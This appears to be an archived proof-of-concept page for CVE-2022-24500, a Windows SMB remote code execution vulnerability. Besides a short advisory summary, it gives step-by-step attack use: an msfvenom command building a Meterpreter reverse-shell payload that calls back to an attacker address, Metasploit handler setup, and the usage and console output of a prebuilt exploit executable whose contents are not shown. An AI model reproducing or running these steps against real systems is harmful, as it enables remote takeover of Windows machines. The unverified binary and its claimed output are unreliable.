PoC details: fb711785c0626bc86318617a67d48ac02131641e

Source
Associated vulnerability
Title: Microsoft Windows SMB Server input validation error vulnerability (CVE-2022-24500)
Description: Microsoft Windows SMB Server is a network file-sharing protocol from Microsoft (USA). It allows applications on a computer to read and write files and to request services from server programs on the computer network. Microsoft Windows SMB Server has an input validation error vulnerability. The following products and versions are affected: Windows 10 Version 1809 for 32-bit Systems, Windows 10 Version 1809 for x64-based Systems, Windows 10 Versi
Introduction
# CVE-2022-24500 RCE Exploit

### Windows SMB Remote Code Execution Vulnerability
Affected versions: Windows 7 - Windows 2022
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24500

### Step 1

```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.10.22.105 LPORT=4444 -f raw > shellcode.bin
```

### Step 2

```bash
msf5 > use multi/handler
msf5 exploit(multi/handler) > set LHOST 192.10.22.105
LHOST => 192.10.22.105
msf5 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > run
```

### Exploit

Usage: `CVE-2022-24500 <ip> <port>`

```bash
C:\>CVE-2022-24500.exe 192.10.22.107 445
CVE-2022-24500 SMB Remote Exploit
[+] Checking... 192.10.22.107 445
[+] 192.10.22.107 445 IsOpen
[+] found low stub at phys addr 13000!
[+] PML4 at 1ad000
[+] base of HAL heap at fffff79480000000
[+] ntoskrnl entry at fffff80645792010
[+] found PML4 self-ref entry 1eb
[+] found HalpInterruptController at fffff79480001478
[+] found HalpApicRequestInterrupt at fffff80645cb3bb0
[+] load shellcode.bin
[+] built shellcode!
[+] KUSER_SHARED_DATA PTE at fffff5fbc0000000
[+] KUSER_SHARED_DATA PTE NX bit cleared!
[+] Wrote shellcode at fffff78000000a00!
[+] Try to execute shellcode!
[+] Exploit Suceess!
```

![image](https://github.com/rkxxz/CVE-2022-24500/blob/main/CVE-2022-24500.gif)

File snapshot

```
[4.0K] /data/pocs/fb711785c0626bc86318617a67d48ac02131641e
├── [ 32K] CVE-2022-24500.exe
├── [993K] CVE-2022-24500.gif
├── [1.4K] README.md
└── [ 341] shellcode.bin

0 directories, 4 files
```
Cached for you by the Shenlong bot
Notes
    1. Accessing the PoC via the original source is recommended.
    2. If the source is no longer available or cannot be accessed, send an e-mail to f.jinxu#gmail.com to request the local snapshot (replace # with @).
    3. Shenlong has taken a snapshot of the PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.